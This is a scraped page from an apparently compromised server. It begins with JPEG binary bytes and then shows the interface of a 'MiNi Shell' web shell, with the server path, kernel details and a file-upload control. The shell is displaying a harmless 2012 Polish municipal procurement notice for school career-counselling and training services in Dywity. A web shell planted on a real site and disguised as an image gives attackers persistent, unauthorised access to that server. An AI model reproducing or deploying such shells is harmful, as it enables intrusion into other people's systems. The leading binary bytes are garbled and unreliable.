JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121109/441056-N-2012.html

<p class="kh_header"><b>Dywity: Wybór wykonawców usługi szkoleniowej w  projekcie Akademia Wysokich Lotów.</b><br>
<b>Numer ogłoszenia: 441056 - 2012; data zamieszczenia: 09.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Dywitach , ul. Olsztyńska 32, 11-001 Dywity, woj. warmińsko-mazurskie, tel. 089 5120160, faks 089 5120124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdywity.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór wykonawców usługi szkoleniowej w  projekcie Akademia Wysokich Lotów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór wykonawców usług szkoleniowych w realizacji projektu Akademia Wysokich Lotów . Projekt przewiduje przeprowadzenie specjalistycznych zajęć pozalekcyjnych z doradztwa zawodowego oraz warsztatów wzmacniających kompetencje interpersonalne dla młodzieży z klas II i III Gimnazjum Publicznego w Dywitach oraz Gimnazjum Publicznego w Tuławkach. Projekt będzie odbywał się w trzech edycjach: I edycja - rok szkolny 2012/2013, II edycja - rok szkolny 2013/2014, III edycja - rok szkolny 2014/2015. W każdej edycji udział weźmie 30 uczniów - 15 uczniów z Gimnazjum w Dywitach i 15 uczniów w Gimnazjum w Tuławkach.
Projekt realizowany jest w partnerstwie z Aeroklubem Warmińsko-Mazurskim. Okres realizacji projektu: 01.09.2012r. - 31.07.2015r. Biuro Projektu mieści się w Urzędzie Gminy w Dywitach. Zamówienie będzie wykonywane w Gimnazjum w Dywitach lub Gimnazjum w Tuławkach, jak również w miejscach wskazanych przez Zamawiającego, związanych z realizacją projektu. W ramach usług szkoleniowych podczas trwania projektu Zamawiający przewiduje zatrudnienie  Wykonawców świadczących usługi szkoleniowe w zakresie:
1.	 Doradztwa zawodowego w Gimnazjum w Dywitach,
2.	 Doradztwa zawodowego w Gimnazjum w Tuławkach, 
3.	 Prowadzenia warsztatów kompetencji zawodowych dla 15 uczniów z Gimnazjum w Dywitach,
4.	 Prowadzenia warsztatów kompetencji zawodowych dla 15 uczniów z Gimnazjum w Tuławkach. 
Zamawiający wymaga dyspozycyjności w miejscu wykonywania zamówienia według ustalonego harmonogramu przez cały okres realizacji projektu. W sytuacjach, w których będzie to niezbędne dla dobra projektu Zamawiający dopuszcza możliwość  pracy również w weekendy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od  osób  prowadzących zajęcia (dotyczy Części I i II):
1)	doświadczenia w prowadzeniu doradztwa zawodowego i realizacji zajęć z młodzie-żą i dziećmi  ( co najmniej dwie  usługi ) ;
2)	wykształcenie wyższe o profilu: psychologia pracy lub doradztwo zawodowe
3)	stopień awansu zawodowego - psycholog, doradca zawodowy
4)	doświadczenie w prowadzeniu doradztwa zawodowego
5)	doświadczenie w prowadzeniu zajęć aktywizujących
6)	doświadczenie w  realizacji zajęć z młodzieżą, dziećmi
7)	co najmniej 5-letnie doświadczenie zawodowe;
8)	pełna zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;
9)	niekaralność;
10)	umiejętność zarządzania czasem;
11)	samodzielność, łatwość nawiązywania kontaktów z ludźmi, komunikatywność;

Podstawą oceny spełnienia warunków będą w szczególności wymagane dokumenty o których mowa powyżej, na zasadzie formuły spełnia - nie spełnia.

 Zamawiający wymaga od  osób  prowadzących zajęcia (dotyczy Części III i IV):
1)	doświadczenia w prowadzeniu zajęć aktywizujących i integrujących dla młodzieży z zakresu komunikacji interpersonalnej (  co najmniej dwie usługi ) ;
2)	wykształcenie wyższe o profilu: psychologia
3)	stopień awansu zawodowego - psycholog
4)	posiadanie certyfikatu NLP
5)	doświadczenie w pracy metodą wg cyklu Kolba
6)	doświadczenie w prowadzeniu zajęć aktywizujących i integrujących dla młodzieży z zakresu komunikacji interpersonalnej
7)	co najmniej 5-letnie doświadczenie zawodowe;
8)	pełna zdolność do czynności prawnych oraz korzystania z pełni praw publicznych;
9)	niekaralność;
10)	umiejętność zarządzania czasem;
11)	samodzielność, łatwość nawiązywania kontaktów z ludźmi, komunikatywność;

Podstawą oceny spełnienia warunków będą w szczególności wymagane dokumenty o których mowa powyżej, na zasadzie formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający działając w oparciu o art.144 ustawy Prawo zamówień publicznych  przewiduje możliwość dokonania zmian postanowień zawartej umowy w przypadkach: 
a.	w szczególnych przypadkach dopuszcza się zmianę osób (wymienionych w ofercie) na osoby o takich samych kwalifikacjach i niemniejszym doświadczeniu,
b.	działanie siły wyższej uzasadniające przesunięcie terminu realizacji umowy,
c.	w przypadku zmian realizacji harmonogramu projektu, termin realizacji umowy ulegnie zmianie o ten sam okres.
2. Powyższe zmiany treści umowy dla swej ważności wymagają formy pisemnej w postaci aneksu podpisanego przez obie strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/dywity_gmina_wiejska/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego, pokój 4, bryła A, tel. 89 524 76 40  Wioleta Grabińska..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.11.2012 godzina 10:00, miejsce: siedziba Zamawiającego, pokój 10- SEKRETARIAT, BRYŁA A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> dofinansowanie ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wybór Wykonawcy usługi szkoleniowej z zakresu indywidualnego doradztwa zawodowego dla 15 uczniów w Gimnazjum w Dywitach ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z zakresu doradztwa zawodowego dla uzdolnionych uczniów II i III klasy Gimnazjum w Dywitach odbywać się będą:
I edycja - rok szkolny 2012/2013  - od listopada 2012r. do czerwca 2013r., 
II edycja - rok szkolny 2013/2014 - od października 2013r. do czerwca 2014r.,
III edycja - rok szkolny 2014/2015 -  od października 2014r. do czerwca 2015r.
Wykonawca Części I - doradztwo zawodowe Wykonawca, w każdym roku szkolnym, będzie przeprowadzał zajęcia z 15 uczniami z Gimnazjum w Dywitach.  Zajęcia będą odbywały się  w Gimnazjum w Dywitach, po zakończonych zajęciach szkolnych i dostosowane do możliwości czasowych uczniów. Dla każdego ucznia Zamawiający przewidział 2 spotkania po 2 godz. lekcyjne dla każdego z 15 uczestników projektu, w każdym roku szklonym. Łącznie zajęcia z indywidualnego doradztwa zawodowego  będą przeprowadzone wśród  45 uczestników projektu w terminie do 30 czerwca 2015r. Łącznie 180 godz. zajęć z uczestnikami projektu z indywidualnego doradztwa zawodowego. Godzina lekcyjna używana w SIWZ odpowiada czasowo 45 minutom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 32.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wybór Wykonawcy usługi szkoleniowej  z zakresu indywidualnego doradztwa zawodowego dla 15 uczniów w Gimnazjum w  Tuławkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z zakresu doradztwa zawodowego dla uzdolnionych uczniów II i III klasy Gimnazjum w  Tuławkach odbywać się będą:
I edycja - rok szkolny 2012/2013  - od listopada 2012r. do czerwca 2013r., 
II edycja - rok szkolny 2013/2014 - od października 2013r. do czerwca 2014r.,
III edycja - rok szkolny 2014/2015 -  od października 2014r. do czerwca 2015r.
Wykonawca Części II - doradztwo zawodowe Wykonawca, w każdym roku szkolnym, będzie przeprowadzał zajęcia z 15 uczniami z Gimnazjum w Tuławkach.  Zajęcia będą odbywały się  w Gimnazjum w Tuławkach, po zakończonych zajęciach szkolnych i dostosowane do możliwości czasowych uczniów. Dla każdego ucznia Zamawiający przewidział 2 spotkania po 2 godz. lekcyjne dla każdego z 15 uczestników projektu, w każdym roku szklonym. Łącznie zajęcia z indywidualnego doradztwa zawodowego  będą przeprowadzone wśród  45 uczestników projektu w terminie do 30 czerwca 2015r. Łącznie 180 godz. zajęć z uczestnikami projektu z indywidualnego doradztwa zawodowego. Godzina lekcyjna używana w SIWZ odpowiada czasowo 45 minutom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 32.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wybór Wykonawcy usługi szkoleniowej z zakresu warsztatów kompetencji interpersonalnych w formie wyjazdowej dla 15 uczniów Gimnazjum w Dywitach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z zakresu warsztatów kompetencji  dla uzdolnionych uczniów II i III klas  Gimnazjum w Dywitach lub Gimnazjum w Tuławkach odbywać się będą:
I edycja - rok szkolny 2012/2013  - listopad 2012r., marzec lub kwiecień 2013r., 
II edycja - rok szkolny 2013/2014 - październik lub listopad 2013r., marzec lub kwiecień 2014r.,
III edycja - rok szkolny 2014/2015 - październik lub listopad 2014r., marzec lub kwiecień 2015r.
Warsztaty wyjazdowe obejmują dwie grupy uczestników po 15 osób w każdej grupie (uczniowie z Gimnazjum w Dywitach i Gimnazjum w Tuławkach), przewidziano 2 trenerów , po jednym na każdą grupę. Warsztaty dla obu grup będą odbywały się jednocześnie w tym samym miejscu i porze. Istnieje możliwość łączenia zajęć. Podczas warsztatów wyjazdowych zagwarantowane są noclegi i wyżywienie. Łącznie, do 30.06.2015r., będzie 6 dwudniowych warsztatów wyjazdowych w okolicach Olsztyna.   
Wykonawca Części III - trener z zakresu warsztatów kompetencji interpersonalnych. Zadaniem trenera będzie wykonanie zajęć z 15 uczniami Gimnazjum w Dywitach w formie dwudniowych warsztatów wyjazdowych. Celem warsztatów jest podniesienie kompetencji interpersonalnych i społecznych wśród uczestników projektu.  Trener powinien zastosować metodę wg cyklu Kolba. Zamawiający, od momentu podpisania umowy do 30.06.2015r., przewidział 6 dwudniowych warsztatów wyjazdowych. Przewidziano 12 godz. lekcyjne  zajęć na jeden dzień pobytu na warsztatach, łącznie 24 godz. lekcyjne zajęć podczas dwóch dni. Łącznie 144 godziny lekcyjne. Zajęcia będą odbywały się od rana w soboty do wieczora w niedzielę.  Godzina lekcyjna używana w SIWZ odpowiada czasowo 45 minutom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 32.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wybór Wykonawcy usługi szkoleniowej z zakresu warsztatów kompetencji interpersonalnych w formie wyjazdowej dla 15 uczniów Gimnazjum w Tuławkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z zakresu warsztatów kompetencji  dla uzdolnionych uczniów II i III klas  Gimnazjum w Dywitach lub Gimnazjum w Tuławkach odbywać się będą:
I edycja - rok szkolny 2012/2013  - listopad 2012r., marzec lub kwiecień 2013r., 
II edycja - rok szkolny 2013/2014 - październik lub listopad 2013r., marzec lub kwiecień 2014r.,
III edycja - rok szkolny 2014/2015 - październik lub listopad 2014r., marzec lub kwiecień 2015r.
Warsztaty wyjazdowe obejmują dwie grupy uczestników po 15 osób w każdej grupie (uczniowie z Gimnazjum w Dywitach i Gimnazjum w Tuławkach), przewidziano 2 trenerów , po jednym na każdą grupę. Warsztaty dla obu grup będą odbywały się jednocześnie w tym samym miejscu i porze. Istnieje możliwość łączenia zajęć. Podczas warsztatów wyjazdowych zagwarantowane są noclegi i wyżywienie. Łącznie, do 30.06.2015r., będzie 6 dwudniowych warsztatów wyjazdowych w okolicach Olsztyna.   
Wykonawca Części IV - trener z zakresu warsztatów kompetencji interpersonalnych Zadaniem trenera będzie wykonanie zajęć z 15 uczniami Gimnazjum w Tuławkach w formie dwudniowych warsztatów wyjazdowych. Celem warsztatów jest podniesienie kompetencji interpersonalnych i społecznych wśród uczestników projektu.  Trener powinien zastosować metodę wg cyklu Kolba. Zamawiający, od momentu podpisania umowy do 30.06.2015r., przewidział 6 dwudniowych warsztatów wyjazdowych. Przewidziano 12 godz. lekcyjne  zajęć na jeden dzień pobytu na warsztatach, łącznie 24 godz. lekcyjne zajęć podczas dwóch dni. Łącznie 144 godziny lekcyjne. Zajęcia będą odbywały się od rana w soboty do wieczora w niedzielę.  Godzina lekcyjna używana w SIWZ odpowiada czasowo 45 minutom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 32.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com